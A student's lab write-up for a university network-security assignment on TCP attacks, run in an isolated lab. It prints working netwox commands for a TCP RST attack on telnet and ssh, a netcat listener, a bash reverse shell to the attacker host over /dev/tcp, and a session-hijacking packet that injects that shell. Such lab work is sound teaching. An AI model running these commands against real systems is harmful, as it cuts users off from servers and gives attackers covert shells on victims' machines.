---
date: '2025-04-05'
description: and assignments
id: A5
modified: 2026-06-05 15:08:40 GMT-04:00
tags:
  - sfwr4c03
title: TCP attacks
created: '2025-04-05'
published: '2025-04-05'
pageLayout: default
slug: thoughts/university/twenty-four-twenty-five/sfwr-4c03/A5
permalink: https://aarnphm.xyz/thoughts/university/twenty-four-twenty-five/sfwr-4c03/A5.md
generator:
  quartz: v4.6.0
  hostedProvider: Cloudflare
  baseUrl: aarnphm.xyz
full: https://aarnphm.xyz/llms-full.txt
---
## TCP RST Attacks on `telnet` and `ssh`

leg IP: `10.0.0.2`, vic IP: `10.0.0.3`

The `netwox` commands are as follow:

```bash
netwox 78 -d eth0 --filter "host 10.0.0.2 and host 10.0.0.3 and port 23"
```

![[thoughts/university/twenty-four-twenty-five/sfwr-4c03/leg.webp]]

![[thoughts/university/twenty-four-twenty-five/sfwr-4c03/attacker-terminal.webp]]

![[thoughts/university/twenty-four-twenty-five/sfwr-4c03/attacker.webp]]

This is for SSH

![[thoughts/university/twenty-four-twenty-five/sfwr-4c03/ssh-leg.webp]]

![[thoughts/university/twenty-four-twenty-five/sfwr-4c03/ssh-wireshark.webp]]

## TCP Session Hijacking

1. The following is the captured image on attacker node:

```bash
netcat -l 9090 -nv
```

![[thoughts/university/twenty-four-twenty-five/sfwr-4c03/attacker-tcp-hijacking.webp]]

The victim node then perform `bin/bash -i > /dev/tcp/10.0.0.1/9090 0<&1 2>&1`

![[thoughts/university/twenty-four-twenty-five/sfwr-4c03/reverse-vic-node.webp]]

The attacker node now completes the reverse shell process, as shown through `ifconfig`

![[thoughts/university/twenty-four-twenty-five/sfwr-4c03/reversed-shell-complete-att.webp]]

2. `netwox` command:

```bash
netwox 40 --ip4-src 10.0.0.2 -m 10.0.0.3 -o 58438 -p 23 -q 2811481894 -r 2489318395 -z -H "0d0a'/bin/bash -i > /dev/tcp/10.0.0.1/9090 0<&1 2>&1'0d0a"
```

![[thoughts/university/twenty-four-twenty-five/sfwr-4c03/attack-node-cmd-reverse.webp]]

![[thoughts/university/twenty-four-twenty-five/sfwr-4c03/new-wireshark.webp]]

## report

Based on the results observed from the network penetration tests, both attacks achieved their intended outcomes. The initial assault, conducted with `netwox 78` effectively terminated the connection between nodes ‘leg’ and ‘vic’ as soon as the command was launched. If the disruption persisted, ‘leg’ was rendered unable to re-establish a link to ‘vic’, which receiving only a “connection closed by foreign host” message in response. This situation demonstrates how an attacker could block a user’s access to a server without much effort.

Similarly, the second offensive strategy utilizing `netwox 40` successful in enabling the stealthy execution of commands on ‘vic’, without leaving any trace of the intrusion. This capability is particularly alarming as it allows an attacker to secretly harvest data or execute harmful activities on a user’s machine, where it would ultimately be without their awareness.